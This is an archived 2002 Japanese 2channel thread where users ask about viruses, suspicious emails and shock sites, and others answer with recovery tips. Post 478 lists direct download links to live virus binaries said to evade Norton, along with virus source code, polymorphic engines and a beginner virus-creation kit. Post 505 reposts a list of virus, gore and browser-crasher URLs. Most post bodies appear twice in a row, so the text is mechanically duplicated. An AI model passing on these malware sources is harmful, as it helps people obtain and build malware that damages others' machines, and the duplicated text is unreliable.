こっちがデフォルトデザインと違ってたら、
違和感あってすぐバレルけどね。
こっちがデフォルトデザインと違ってたら、
違和感あってすぐバレルけどね。
447 :名無しさん@お腹いっぱい。:02/02/25 17:34
>>445
何も心配ないよ。
何も心配ないよ。
448 : :02/02/25 17:49
違うところにも書いてしまったけど、どうしても情報が欲しいので書かさせていただきます
ttp://homepage3.nifty.com/girls_and_boys~/
ここふんじゃったらクライジーゴーストの口から血をだしてる女の画像が出てきたのですが、ここによるパソコンへの悪影響はあるんですか?
困っています、申し訳ありませんが教えてください。
最後に、マルチですいません。
ttp://homepage3.nifty.com/girls_and_boys~/
ここふんじゃったらクライジーゴーストの口から血をだしてる女の画像が出てきたのですが、ここによるパソコンへの悪影響はあるんですか?
困っています、申し訳ありませんが教えてください。
最後に、マルチですいません。
449 :名無しさん@お腹いっぱい。:02/02/25 18:12
>>448
元のcrazygostと同じ、後は自分で情報さがしてね。
元のcrazygostと同じ、後は自分で情報さがしてね。
450 :W32/Klez」ウイルスの亜種:02/02/26 17:08
451 :名無しさん@お腹いっぱい。:02/02/26 18:09
ウィルスって貼ると逮捕されるの?
452 :名無しさん@お腹いっぱい。:02/02/26 19:29
453 :名無しさん@お腹いっぱい。:02/02/26 19:37
>>452
上はちょっと前に流行った田代のフラッシュだよ。見る価値あり。
下はなんかよく分からない科学の話題のサイト。
↓こんなやつ
洸人LIBRARY
The Mituto Library
田中 洸人 作
上はちょっと前に流行った田代のフラッシュだよ。見る価値あり。
下はなんかよく分からない科学の話題のサイト。
↓こんなやつ
洸人LIBRARY
The Mituto Library
田中 洸人 作
454 :452:02/02/26 19:39
>>453
ありがとうございます
ありがとうございます
455 :名無しさん@お腹いっぱい。:02/02/26 23:53
この板の「このウィルス何?」スレに入ろうとしたら
ウィルスが検出されました、というウィンドウが出たので慌てて閉じました。
もしかしてあのスレはウィルスに汚染されているのですか?
ほっといたら大勢感染してしまうのでしょうか?
もしかして凄く危ないのでは?
(PCにうといのでたいした事じゃなかったらすみません)
ウィルスが検出されました、というウィンドウが出たので慌てて閉じました。
もしかしてあのスレはウィルスに汚染されているのですか?
ほっといたら大勢感染してしまうのでしょうか?
もしかして凄く危ないのでは?
(PCにうといのでたいした事じゃなかったらすみません)
456 :名無しさん@お腹いっぱい。:02/02/27 00:26
あ、たいした事じゃないみたいですね、
これがノートンなのかどうかも分からないけど
McAfee VSieldというのが警告してくるもので驚いてしまって。
お返事ありがとうございました。
これがノートンなのかどうかも分からないけど
McAfee VSieldというのが警告してくるもので驚いてしまって。
お返事ありがとうございました。
458 :名無しさん@お腹いっぱい。:02/02/27 00:47
>>455-457
なんか微笑ましい。
なんか微笑ましい。
459 :名無しさん@お腹いっぱい。:02/02/27 00:52
>>457
そうだと思った
そうだと思った
今マカフィーについてのスレ読んでます。
色々問題ありなソフトみたいですね(^^;)
これから勉強します。どうもありがとう。
色々問題ありなソフトみたいですね(^^;)
これから勉強します。どうもありがとう。
461 : :02/02/27 14:53
462 :433:02/02/27 15:28
>>433のお答え待ってます。
463 :名無しさん@お腹いっぱい。:02/02/27 17:15
>>462
<center><a
onClick="this.style.behavior='url(#default#homepage)'; this.setHomePage('http://www.jethomepage.com');"
href="http://www.jethomepage.com/"><font face="Arial, Helvetica, sans-serif" size="2" >Make
JetHomePage Your Homepage</font><font face=Verdana
size=2>
</font></a>
これクリックしただけちゃうんか
<center><a
onClick="this.style.behavior='url(#default#homepage)'; this.setHomePage('http://www.jethomepage.com');"
href="http://www.jethomepage.com/"><font face="Arial, Helvetica, sans-serif" size="2" >Make
JetHomePage Your Homepage</font><font face=Verdana
size=2>
</font></a>
これクリックしただけちゃうんか
>>462
なんとなく助言(励まし)
とは言ってもOSもIEのヴァージョンも何も書いてないので大雑把に…
レジストリの復元をためしてみる(多分というかもう無理だろうけど)
DOSで起動→"scanreg /restore"
もしくは(Meの場合)ファイル名指定して実行→"scanreg /restore"
IEの修復も試してみる
コンパネ→アプリの追加削除→IE選択
もしくはファイル名してして実行→"rundll32 setupwbv.dll,IE6Maintenance"
(IE5かIE5.5なら"rundll32 setupwbv.dll,IE5Maintenance")
↑でもダメだったらファイル名指定して実行→"regedit"で自分でレジストリエディタ動かして細かく調べるべし。
#当然だけど二重引用符は入力するべき文字列に含まない
…ていうかウィルス命判明したんなら(おそらく"js.seeker.b")スマンテックとかにも具体的な復旧方法のってるでしょ。
駆除したら復旧は自分でやる!!!お前のマシンはお前しか知らん!(・∀・)
とりあえず参考
http://www.symantec.com/region/jp/sarcj/data/j/js.seeker.b.html
(外れてても文句ナシでおながい(_ _(--;(_ _(--; ペコペコ)
なんとなく助言(励まし)
とは言ってもOSもIEのヴァージョンも何も書いてないので大雑把に…
レジストリの復元をためしてみる(多分というかもう無理だろうけど)
DOSで起動→"scanreg /restore"
もしくは(Meの場合)ファイル名指定して実行→"scanreg /restore"
IEの修復も試してみる
コンパネ→アプリの追加削除→IE選択
もしくはファイル名してして実行→"rundll32 setupwbv.dll,IE6Maintenance"
(IE5かIE5.5なら"rundll32 setupwbv.dll,IE5Maintenance")
↑でもダメだったらファイル名指定して実行→"regedit"で自分でレジストリエディタ動かして細かく調べるべし。
#当然だけど二重引用符は入力するべき文字列に含まない
…ていうかウィルス命判明したんなら(おそらく"js.seeker.b")スマンテックとかにも具体的な復旧方法のってるでしょ。
駆除したら復旧は自分でやる!!!お前のマシンはお前しか知らん!(・∀・)
とりあえず参考
http://www.symantec.com/region/jp/sarcj/data/j/js.seeker.b.html
(外れてても文句ナシでおながい(_ _(--;(_ _(--; ペコペコ)
465 :たすけて〜:02/02/27 20:11
さっきから一分おきくらいに誰かはいってこようとしてブロックしましたって
でるんですけどどうしたらいいの?退治できないですか?おしえて〜
でるんですけどどうしたらいいの?退治できないですか?おしえて〜
466 :名無しさん@お腹いっぱい。:02/02/27 20:13
>465
日本語を話してください。つーかウイルスじゃないじゃん。
日本語を話してください。つーかウイルスじゃないじゃん。
>>465 (´-`).。oO(該当するportを閉めておけばよかろう?)
469 :名無しさん@お腹いっぱい。:02/02/27 23:09
誰か、胎児並みの>>465を退治できないですか?おしえて〜(w
470 :名無しさん@お腹いっぱい。:02/02/27 23:14
>>469
ブロックしてるんだからいいんじゃない
ブロックしてるんだからいいんじゃない
471 :名無しさん@お腹いっぱい。:02/02/28 01:06
今日は何だかウィルスメールらしきものがガンガン送られて来てますよ〜。。
同じとこから、193バイトのメールがもう10回くらい来とります。
皆さんはいかがですか??
同じとこから、193バイトのメールがもう10回くらい来とります。
皆さんはいかがですか??
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
uirusu chuui
[email protected]
[email protected]
[email protected]
[email protected]
uirusu chuui
473 : :02/02/28 12:33
すいません、お聞きします。
きのう、添付メールでYOU_ARE_FAT!.MP3.scrがきたのですが、
IE5.5SP2なら問題ないでしょうか?。
プレビューで開いてしまったのですが、「保存」か「開く」のダイアログが出てキャンセルして削除しました。
きのう、添付メールでYOU_ARE_FAT!.MP3.scrがきたのですが、
IE5.5SP2なら問題ないでしょうか?。
プレビューで開いてしまったのですが、「保存」か「開く」のダイアログが出てキャンセルして削除しました。
474 :名無しさん@お腹いっぱい。:02/02/28 13:22
475 :473:02/02/28 15:44
476 :名無しさん@お腹いっぱい。:02/02/28 16:01
>>476
ありがと。安心しました。
ありがと。安心しました。
478 :ノートンでは反応しないウイルス?:02/02/28 17:12
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
ノートンでは反応しないウイルス?
http://www.ebcvg.com/binary2.php の
Mac.Scores (ノートンの検出名)
http://www.ebcvg.com/sections/binary/Mac.Scores.zip
Mac.T4d
http://www.ebcvg.com/sections/binary/Mac.T4d.zip
Win32.Mix
http://www.ebcvg.com/sections/binary/Win32.Mix.zip (W32.Fully.3424)
Win2k.TaiChi
http://www.ebcvg.com/sections/binary/Win2k.TaiChi.zip (W2K.Lamchi)
Win32.Sharp
http://www.ebcvg.com/sections/binary/Win32.Sharp.zip (W32.HLLP.Sharpei@mm)
I-Worm.Grifin
http://www.ebcvg.com/sections/binary/I-Worm.Grifin.zip (W32.Grifout.Worm)
以上の2つはノートンは反応しません。
−−−−−−
http://www.ebcvg.com/viruses.php
Virus Source Codes
Polymorphic Engines
がある。
http://www.ebcvg.com/sections/polymorphic/W97M.txt
はBloodhound.HybridCOM
知識があればウイルスが作成できる。
ウイルス作成ソフトもある。
http://www.ebcvg.com/binary.php
http://vx.netlux.org/dat/vct.shtml
ノートンでは反応しないウイルス?
http://www.ebcvg.com/binary2.php の
Mac.Scores (ノートンの検出名)
http://www.ebcvg.com/sections/binary/Mac.Scores.zip
Mac.T4d
http://www.ebcvg.com/sections/binary/Mac.T4d.zip
Win32.Mix
http://www.ebcvg.com/sections/binary/Win32.Mix.zip (W32.Fully.3424)
Win2k.TaiChi
http://www.ebcvg.com/sections/binary/Win2k.TaiChi.zip (W2K.Lamchi)
Win32.Sharp
http://www.ebcvg.com/sections/binary/Win32.Sharp.zip (W32.HLLP.Sharpei@mm)
I-Worm.Grifin
http://www.ebcvg.com/sections/binary/I-Worm.Grifin.zip (W32.Grifout.Worm)
以上の2つはノートンは反応しません。
−−−−−−
http://www.ebcvg.com/viruses.php
Virus Source Codes
Polymorphic Engines
がある。
http://www.ebcvg.com/sections/polymorphic/W97M.txt
はBloodhound.HybridCOM
知識があればウイルスが作成できる。
ウイルス作成ソフトもある。
http://www.ebcvg.com/binary.php
479 :471:02/02/28 17:59
今日もウィルスらしきメール(添付ファイル付きで、タイトル文字化け)が
この時間までに28件も送られてきました。。
オイラ、誰かに恨まれてるのかなぁ。。(涙目)
この時間までに28件も送られてきました。。
オイラ、誰かに恨まれてるのかなぁ。。(涙目)
>>479
http://www.jcsa.or.jp/
http://www.jcsa.or.jp/NoMoreHybr.html
メールが >>479 アドレスに来ている場合、次の原因が考えられる。
A.メールアドレスをWebページ上で公開している。
B.感染パソコンのユーザーとメールのやりとりがあった。
C.掲示板にメールアドレスを書き込んだ。
実際には、Aのパターンが圧倒的に多い。メールの送受信にかかる時間と
Webを閲覧する時間を比べれば、後者の方が何倍も多いからだ。
また、掲示板よりWebページ閲覧をする人数の方が多い。
Webページに対策を施すことによりAのパターンのHybrisメールを減らす、
またはなくすことができる。
なお、Cのパターンはとりあえずメールアドレスを書かない、
またはフリーメールアドレスを利用するという方法しかないだろう。
[email protected]
http://www.jcsa.or.jp/
http://www.jcsa.or.jp/NoMoreHybr.html
メールが >>479 アドレスに来ている場合、次の原因が考えられる。
A.メールアドレスをWebページ上で公開している。
B.感染パソコンのユーザーとメールのやりとりがあった。
C.掲示板にメールアドレスを書き込んだ。
実際には、Aのパターンが圧倒的に多い。メールの送受信にかかる時間と
Webを閲覧する時間を比べれば、後者の方が何倍も多いからだ。
また、掲示板よりWebページ閲覧をする人数の方が多い。
Webページに対策を施すことによりAのパターンのHybrisメールを減らす、
またはなくすことができる。
なお、Cのパターンはとりあえずメールアドレスを書かない、
またはフリーメールアドレスを利用するという方法しかないだろう。
[email protected]
481 :名無しさん@お腹いっぱい。:02/02/28 21:09
なんか今日、パソコン開いたら画面がゆれていて止まりません。これはウィルスなのでしょうか?なおらないのでしょうか?知っている方いたら教えてください。
482 :cheshire-cat:02/02/28 21:16
>>481
他のディスプレイ使っても?
他のディスプレイ使っても?
483 :名無しさん@お腹いっぱい。:02/02/28 21:28
>>481
それだけじゃウィルスかどうかわからん。
それだけじゃウィルスかどうかわからん。
484 :名無しさん@お腹いっぱい。:02/02/28 21:43
圧縮ファイルをスキャンする際にDoS攻撃を仕掛けることが出来る可能性が発見された。
http://www.securiteam.com/securitynews/5PP0P1P6AM.html
なんだってさ。
古い手だけど、結構やられると嫌だよね。
ところで、防ぎようあるのかな??
http://www.securiteam.com/securitynews/5PP0P1P6AM.html
なんだってさ。
古い手だけど、結構やられると嫌だよね。
ところで、防ぎようあるのかな??
485 :名無しさん@お腹いっぱい。:02/02/28 21:45
486 :名無しさん@お腹いっぱい。:02/02/28 21:53
そばに別のディスプレイとか防磁の弱いスピーカとか置いてない? >>481
487 :名無しさん@お腹いっぱい。:02/02/28 22:11
>>484
例えばzipは圧縮率がセントラルディレクトリに書かれているから、異常な奴は見分けられる。
例えばzipは圧縮率がセントラルディレクトリに書かれているから、異常な奴は見分けられる。
488 :481:02/02/28 22:12
489 :名無しさん@お腹いっぱい。:02/02/28 23:47
今日怪しいメールが来ました。タイトルが「Re: error message」という
メールで、本文はHTML形式のようで、延々とJavaScriptで何やら記述されて
います。意味のありそうな、というか文章は入っていませんでした。
自分はMacなんで消しちゃえば関係ないのですが、念の為どのようなウイルス
か知っておきたいのです。
どなたかお判りになりますでしょうか?
メールで、本文はHTML形式のようで、延々とJavaScriptで何やら記述されて
います。意味のありそうな、というか文章は入っていませんでした。
自分はMacなんで消しちゃえば関係ないのですが、念の為どのようなウイルス
か知っておきたいのです。
どなたかお判りになりますでしょうか?
490 :826:02/03/01 00:37
結局ウイルスから身を守るために一番有効なのはなんですか?
ネットするナトカなしで。
ネットするナトカなしで。
491 :名無しさん@お腹いっぱい。:02/03/01 00:47
自分のスキルを上げる
492 :名無しさん@お腹いっぱい。:02/03/01 00:49
>>490
毎日クリーンインストール
毎日クリーンインストール
493 :名無しさん@お腹いっぱい。:02/03/01 01:11
>>490
外から帰ってきたら必ずうがいすること
外から帰ってきたら必ずうがいすること
494 : :02/03/01 19:27
495 :名無しさん@お腹いっぱい。:02/03/01 19:45
乾布摩擦って効くのかな
496 :cheshire-cat:02/03/01 20:03
497 :名無しさん@お腹いっぱい。:02/03/01 21:53
初心者スレから誘導されてきました。
UDをやってるのでつなぎっぱなしにしてますが、
自分が不在のときにBADTRANS.Bが検出されてました。
しかも発見されたファイルはc:\RECYCLED\DC32.TMPにあって
ゴミ箱を開いても発見されませんでした。とりあえず
ゴミ箱は空にして再度チェックしたらなくなったようですが
これで問題ないでしょうか?
ちなみにウィルスバスターで隔離されてるかもしれないです。
今トレンドマイクロの方にも試しに解析メール出してます。
UDをやってるのでつなぎっぱなしにしてますが、
自分が不在のときにBADTRANS.Bが検出されてました。
しかも発見されたファイルはc:\RECYCLED\DC32.TMPにあって
ゴミ箱を開いても発見されませんでした。とりあえず
ゴミ箱は空にして再度チェックしたらなくなったようですが
これで問題ないでしょうか?
ちなみにウィルスバスターで隔離されてるかもしれないです。
今トレンドマイクロの方にも試しに解析メール出してます。
498 :名無しさん@お腹いっぱい。:02/03/01 22:02
499 :名無しさん@お腹いっぱい。:02/03/01 22:14
500 :名無しさん@お腹いっぱい。:02/03/01 22:26
501 :497:02/03/01 22:27
表示する設定にはもちろんなってますが、今見ても
ファイルがひとつあるようです。
ファイルがひとつあるようです。
IEとOEに任意コマンド起動の欠陥
504 :名無しさん@お腹いっぱい。:02/03/02 18:31
>>502 の問題、例のIEの欠陥でウイルスに利用される可能性…とは、
ウイルスコードを送りこんでおいて、Htmlでコードを実行させる
ってパターンかな??フルPATHの取得が難しそうだが…どうなんだろう?
それとも、既存のプログラムの機能をウイルスで利用するってことかな?
ウイルスコードを送りこんでおいて、Htmlでコードを実行させる
ってパターンかな??フルPATHの取得が難しそうだが…どうなんだろう?
それとも、既存のプログラムの機能をウイルスで利用するってことかな?
505 :別スレより:02/03/02 21:45
ウイルスブラクラ集初心者は注意されたし
Brocralist.txt
yahoo5briefcase.vr9.com/preteen/__tn___________kidsux.jpgeasyweb.easynet.co.uk/~hiros/virii00/METALLICA_SONG.MP3 ウィルス
easyweb.easynet.co.uk/~hiros/virii00/METALLICA_SONG.MP3 ウィルス
bbs.666host.com/ ウィルス
easyweb.easynet.co.uk/~hiros/ ウィルス
www.geocities.com/ccsacla/images0012.jpg ウィルス
zodiad.subnet.dk/image_002.jpg ウィルス
go5.163.com/sg9741/ ウィルス
www.ddanzi.com/ddanziilbo/bbs/cwb-data/data/FtvBBS/vavy.jpg グロ
vatican.rotten.com/infantiphagia/taboo2.html グロ
vagina.rotten.com/motorcycle/motorcycle.jpg グロ
village.infoweb.ne.jp/~angie/image/mist/movie/kill.mpeg グロ
www.trauma.softcoma.com/pictures/headless/15-kepa3.jpg グロ
www.stileproject.com/monkey_sugar.swf グロ
movies.ogrish.com/elevator.zip グロ
f1italia.monrif.net/08video/altrivideo/video1977.php3 グロ
www.trauma.softcoma.com/pictures/anenceph/index.htm グロ
ime.nu/www.eternal.rest.org.uk/58cy/flesh/3rd-ci53/b268-119.jpg グロ
myhome.hananet.net/~crazyghost/goto.htm 恐怖
voo.to/morninggazou 恐怖
www.popkmart.ne.jp/dl/tousatu.html 恐怖
homepage3.nifty.com/girls_and_boys~/ 恐怖
www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/files/madoka08.zip 恐怖
www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/files/hikaru04.zip 恐怖
www.geocities.co.jp/SiliconValley-Bay/4700/image01.gif 恐怖
www.mobilestation.tv/~feel/img/image01.gif 恐怖
r2.ugfree.to/~Sweet01/syasin.htm 恐怖
www.trebus.fsnet.co.uk/vir2/world/che-19aj/uiho.htm 虐殺
iran-e-azad.org/stoning/stoning-19.rm 虐殺
iran-e-azad.org/stoning/stoning-28.rm 虐殺
iran-e-azad.org/stoning/stoning-56m.rm 虐殺
iran-e-azad.org/stoning/stoning-56i.rm 虐殺
iran-e-azad.org/stoning/stoning-t1.rm 虐殺
cgi.members.interq.or.jp/hokkaido/asato/upload/jam3ddr/OB000153.jpg ブラクラ
www.adapo.net/upload/source/up0095.jpg ブラクラ
homepage2.nifty.com/superpage/opai.htm ブラクラ
isweb16.infoseek.co.jp/photo/tokioufo/hiroba.html ブラクラ
www.raus.de/crashme ブラクラ
www.southern-charms.com/pat/p8618.jpg 精神的ブラクラ
www.bayer-doyaku.com/roach/gerroa.jpg 精神的ブラクラ
www.mayhem.net/juke/bodiesbeat1.html 精神的ブラクラ
i.kebi.lycos.co.kr/~artkebi/whi.html 精神的ブラクラ
kitty-guys.hypermart.net/degawa.cgi 精神的ブラクラ
www.top.or.jp/~godhand/a2.html 精神的ブラクラ
members.tripod.co.jp/hama_ayu_poa/Daybreak.htm 精神的ブラクラ
www.dab.hi-ho.ne.jp/paramo/ 精神的ブラクラ
www.hpsozai.com/up/ap.cgi?get=2002212214830.jpg 精神的ブラクラ
bbsrent.vibe-station.com/uploader/img-box/img30.jpg 精神的ブラクラ
www.yaromat.com/macos8/index.htm ジョーク
mbspro5.uic.to/user/mikkixi.html ブラクラ
mitsuura.tripod.co.jp/offmeeting.jpg ブラクラ
www.hoops.ne.jp/~zaqro34/001MOVEBOX/index.html ブラクラ
www2.ocn.ne.jp/~ling/img/dog_p16.jpg グロ
home.kimo.com.tw/netspooky/kikia/kikia.swf 恐怖
www.eternal.rest.org.uk/58cy/30s/myh-cnb1/30s512.jpg グロ
Brocralist.txt
yahoo5briefcase.vr9.com/preteen/__tn___________kidsux.jpgeasyweb.easynet.co.uk/~hiros/virii00/METALLICA_SONG.MP3 ウィルス
easyweb.easynet.co.uk/~hiros/virii00/METALLICA_SONG.MP3 ウィルス
bbs.666host.com/ ウィルス
easyweb.easynet.co.uk/~hiros/ ウィルス
www.geocities.com/ccsacla/images0012.jpg ウィルス
zodiad.subnet.dk/image_002.jpg ウィルス
go5.163.com/sg9741/ ウィルス
www.ddanzi.com/ddanziilbo/bbs/cwb-data/data/FtvBBS/vavy.jpg グロ
vatican.rotten.com/infantiphagia/taboo2.html グロ
vagina.rotten.com/motorcycle/motorcycle.jpg グロ
village.infoweb.ne.jp/~angie/image/mist/movie/kill.mpeg グロ
www.trauma.softcoma.com/pictures/headless/15-kepa3.jpg グロ
www.stileproject.com/monkey_sugar.swf グロ
movies.ogrish.com/elevator.zip グロ
f1italia.monrif.net/08video/altrivideo/video1977.php3 グロ
www.trauma.softcoma.com/pictures/anenceph/index.htm グロ
ime.nu/www.eternal.rest.org.uk/58cy/flesh/3rd-ci53/b268-119.jpg グロ
myhome.hananet.net/~crazyghost/goto.htm 恐怖
voo.to/morninggazou 恐怖
www.popkmart.ne.jp/dl/tousatu.html 恐怖
homepage3.nifty.com/girls_and_boys~/ 恐怖
www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/files/madoka08.zip 恐怖
www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/files/hikaru04.zip 恐怖
www.geocities.co.jp/SiliconValley-Bay/4700/image01.gif 恐怖
www.mobilestation.tv/~feel/img/image01.gif 恐怖
r2.ugfree.to/~Sweet01/syasin.htm 恐怖
www.trebus.fsnet.co.uk/vir2/world/che-19aj/uiho.htm 虐殺
iran-e-azad.org/stoning/stoning-19.rm 虐殺
iran-e-azad.org/stoning/stoning-28.rm 虐殺
iran-e-azad.org/stoning/stoning-56m.rm 虐殺
iran-e-azad.org/stoning/stoning-56i.rm 虐殺
iran-e-azad.org/stoning/stoning-t1.rm 虐殺
cgi.members.interq.or.jp/hokkaido/asato/upload/jam3ddr/OB000153.jpg ブラクラ
www.adapo.net/upload/source/up0095.jpg ブラクラ
homepage2.nifty.com/superpage/opai.htm ブラクラ
isweb16.infoseek.co.jp/photo/tokioufo/hiroba.html ブラクラ
www.raus.de/crashme ブラクラ
www.southern-charms.com/pat/p8618.jpg 精神的ブラクラ
www.bayer-doyaku.com/roach/gerroa.jpg 精神的ブラクラ
www.mayhem.net/juke/bodiesbeat1.html 精神的ブラクラ
i.kebi.lycos.co.kr/~artkebi/whi.html 精神的ブラクラ
kitty-guys.hypermart.net/degawa.cgi 精神的ブラクラ
www.top.or.jp/~godhand/a2.html 精神的ブラクラ
members.tripod.co.jp/hama_ayu_poa/Daybreak.htm 精神的ブラクラ
www.dab.hi-ho.ne.jp/paramo/ 精神的ブラクラ
www.hpsozai.com/up/ap.cgi?get=2002212214830.jpg 精神的ブラクラ
bbsrent.vibe-station.com/uploader/img-box/img30.jpg 精神的ブラクラ
www.yaromat.com/macos8/index.htm ジョーク
mbspro5.uic.to/user/mikkixi.html ブラクラ
mitsuura.tripod.co.jp/offmeeting.jpg ブラクラ
www.hoops.ne.jp/~zaqro34/001MOVEBOX/index.html ブラクラ
www2.ocn.ne.jp/~ling/img/dog_p16.jpg グロ
home.kimo.com.tw/netspooky/kikia/kikia.swf 恐怖
www.eternal.rest.org.uk/58cy/30s/myh-cnb1/30s512.jpg グロ
506 :cheshire-cat:02/03/02 22:00
漏れ的には、エクセプションよりもババアのグロ画像がブラクラ。
精神的に。
精神的に。
507 :名無しさん@お腹いっぱい。:02/03/02 22:05
半角板にはられたgodhandというサイトに誤っていってしまいウイルスを
感染させられました。オンラインウイルスチェック済みです。
対策ソフト持ってなくて・・・鬱。体験版もあらかた使い切ってしまった・・・。
そのウイルスサイトへのリンクを貼った人を法的に訴えることは可能でしょうか?
感染させられました。オンラインウイルスチェック済みです。
対策ソフト持ってなくて・・・鬱。体験版もあらかた使い切ってしまった・・・。
そのウイルスサイトへのリンクを貼った人を法的に訴えることは可能でしょうか?
508 :cheshire-cat:02/03/02 22:10
509 :名無しさん@お腹いっぱい。:02/03/02 22:20
>>508 いや、確かにオンラインウイルスチェックで一つだけでしたが
ウイルス反応が出たのです。もうどうしたらいいのか・・・。
お金ないからソフト買えないし・・・。ともあれご進言ありがとうございます。
ウイルス反応が出たのです。もうどうしたらいいのか・・・。
お金ないからソフト買えないし・・・。ともあれご進言ありがとうございます。
510 :cheshire-cat:02/03/02 22:24
>>509
ちょっと待て。
何が出た?どこに?
別サイトか?
オンラインチェックはウイルス定義ファイルが最新じゃない時があるから、これ。
ジャバスク使ってないとDLさせてくれないけど。
アンインストールに失敗することは無いから、Antidote簡易版を薦める。
http://www.vintage-solutions.com/Japanese/Antivirus/Super/
ちょっと待て。
何が出た?どこに?
別サイトか?
オンラインチェックはウイルス定義ファイルが最新じゃない時があるから、これ。
ジャバスク使ってないとDLさせてくれないけど。
アンインストールに失敗することは無いから、Antidote簡易版を薦める。
http://www.vintage-solutions.com/Japanese/Antivirus/Super/
511 :名無しさん@お腹いっぱい。:02/03/02 22:35
512 :名無しさん@お腹いっぱい。:02/03/02 22:40
半角のそのサイトを覗いてみましたがどうやら自分以外には
被害者は出ていないようです。それとも自分と同じく何も言えずに
いるのだろうか・・・。そのウイルスサイトへのリンクから大分
レスが結構付いているだけにとても不自然というか、不気味ですね・・・。
そのサイトのアドレスの一部に間違いなくgodhandとあります。
自分の下心が招いた悲しい結果だけに何ともやりきれません。
被害者は出ていないようです。それとも自分と同じく何も言えずに
いるのだろうか・・・。そのウイルスサイトへのリンクから大分
レスが結構付いているだけにとても不自然というか、不気味ですね・・・。
そのサイトのアドレスの一部に間違いなくgodhandとあります。
自分の下心が招いた悲しい結果だけに何ともやりきれません。
513 :名無しさん@お腹いっぱい。:02/03/02 22:54
gohandは推定20万人の初心者が騙されてこの板に泣きついてきてるんだよ。
gohandにいっても、ウィルスチェックに引っかかる可能性は全く無いわけだ。
> いや、確かにオンラインウイルスチェックで一つだけでしたが
どこのオンラインチェックでなんと言うウィルスが検出されたんだ?
gohandにいっても、ウィルスチェックに引っかかる可能性は全く無いわけだ。
> いや、確かにオンラインウイルスチェックで一つだけでしたが
どこのオンラインチェックでなんと言うウィルスが検出されたんだ?
514 :名無しさん@お腹いっぱい。:02/03/02 22:54
>512
このスレを最初からじっくりと読み直せ。
このスレを最初からじっくりと読み直せ。
515 :名無しさん@お腹いっぱい。:02/03/03 00:38
>>510 cheshire-catさん、治りました!教えてもらったアンチドートというソフト
を念入りに2回かけて、もう一度トレンドマイクロのオンラインスキャンにかけてみたら
ウイルスは検出されませんでした!ほんとーーーーにありがとうございました。
おかげで助かりました。このご恩は忘れません。m(__)m
>>513 トレンドマイクロのオンラインスキャンを利用しました。検出された
ウイルスは取り乱してしまっててちょっと覚えてないんですけれど、数量は1、
ウイルスが検出されたとハッキリ表示されました。もうこれに懲りて怪しげな
サイトは踏みません。
どうもお世話になりました。ここっていい人多いんですね。それでは失礼します。
を念入りに2回かけて、もう一度トレンドマイクロのオンラインスキャンにかけてみたら
ウイルスは検出されませんでした!ほんとーーーーにありがとうございました。
おかげで助かりました。このご恩は忘れません。m(__)m
>>513 トレンドマイクロのオンラインスキャンを利用しました。検出された
ウイルスは取り乱してしまっててちょっと覚えてないんですけれど、数量は1、
ウイルスが検出されたとハッキリ表示されました。もうこれに懲りて怪しげな
サイトは踏みません。
どうもお世話になりました。ここっていい人多いんですね。それでは失礼します。
516 :名無しさん@お腹いっぱい。:02/03/03 00:42
まぁそのウィルスは他のところでもらってきたものだーね(godhandは無害なので)
517 :名無しさん@お腹いっぱい。:02/03/03 04:26
あんまり「godhandは無害」と断言すると、
似たようなURL使って有害サイト立ち上げる
阿呆が出てくると思われ…
似たようなURL使って有害サイト立ち上げる
阿呆が出てくると思われ…
518 :427:02/03/04 00:40
まえに書いたアフォです。
あれいらい、www.yahoo.comやwww.google.comのような有名どころにアクセスできなくなりました。
pingかけても全く反応なしです。
いろいろWEBをあさってみましたがさっぱり原因不明。もちろんウイスルなんていません。
やってきたグリーティングコムなるところを調べてもすでにもぬけの殻。
どうもどっかの会社が大量にアドレスを購入して再販しているものらしく、
いかにも詐欺の温床と言った使われ方したみたいで。
あああ、どうやったらみれるようになるのかな。
ちなみにIE6です。(これが一番の原因かな)
あれいらい、www.yahoo.comやwww.google.comのような有名どころにアクセスできなくなりました。
pingかけても全く反応なしです。
いろいろWEBをあさってみましたがさっぱり原因不明。もちろんウイスルなんていません。
やってきたグリーティングコムなるところを調べてもすでにもぬけの殻。
どうもどっかの会社が大量にアドレスを購入して再販しているものらしく、
いかにも詐欺の温床と言った使われ方したみたいで。
あああ、どうやったらみれるようになるのかな。
ちなみにIE6です。(これが一番の原因かな)
519 :名無しさん@お腹いっぱい。:02/03/04 00:52
>>518
はやくクリーンインストールしろ
はやくクリーンインストールしろ
520 :名無しさん@お腹いっぱい。:02/03/04 00:54
フォルダ名は残って、中のファイルだけをクリアするウィルスってあるの。
今日、ノートン先生が悲鳴をあげて死んだあと、目の前でデスクトップの
アイコンが半分くらいなくなった。DとEのFAT32ドライブがフォルダだけ
残して空っぽになった。
今日、ノートン先生が悲鳴をあげて死んだあと、目の前でデスクトップの
アイコンが半分くらいなくなった。DとEのFAT32ドライブがフォルダだけ
残して空っぽになった。
521 :いらっしゃいませ:02/03/04 01:07
HDぜんぶ消去した上ズタズタに!!ウィルス 2台目
http://pc.2ch.net/test/read.cgi/sec/1012296560/l50
破損、トロイ、ウィルス入り 3
http://tmp.2ch.net/test/read.cgi/download/1010071094/l50
http://pc.2ch.net/test/read.cgi/sec/1012296560/l50
破損、トロイ、ウィルス入り 3
http://tmp.2ch.net/test/read.cgi/download/1010071094/l50
522 :名無しさん@お腹いっぱい。:02/03/04 01:14
>>520
頼むからクリーンインストールしてくれよ。お願いします。
頼むからクリーンインストールしてくれよ。お願いします。
523 :名無しさん@お腹いっぱい。:02/03/04 01:28
これだけは見るな
ttp://skyscraper.fortunecity.com/laser/928/virusdownload.shtml
ttp://tokyo.cool.ne.jp/blackhat
ttp://skyscraper.fortunecity.com/laser/928/virusdownload.shtml
ttp://tokyo.cool.ne.jp/blackhat
524 :もう、だめぽ:02/03/04 02:01
ウイルスに感染したら、
すべてクリーンインストールしなきゃ、だめぽ!
すべてクリーンインストールしなきゃ、だめぽ!
525 :名無しさん@お腹いっぱい。:02/03/04 02:51
526 :名無しさん@お腹いっぱい:02/03/04 03:01
絶対にメールが来るハズのないアドレスからメールが来まして、不審
に思って件名を検索したらW32/Klez-Eがそのような件名のメールを
送ることがあることが分かりました。
しかし、それ以前にこのメールには添付ファイルがついていませんで
した。
オンラインスキャンかけてもウイルスは見つからなかったので感染等
の問題はないのだとは思いますが、あまりにも謎なので…。
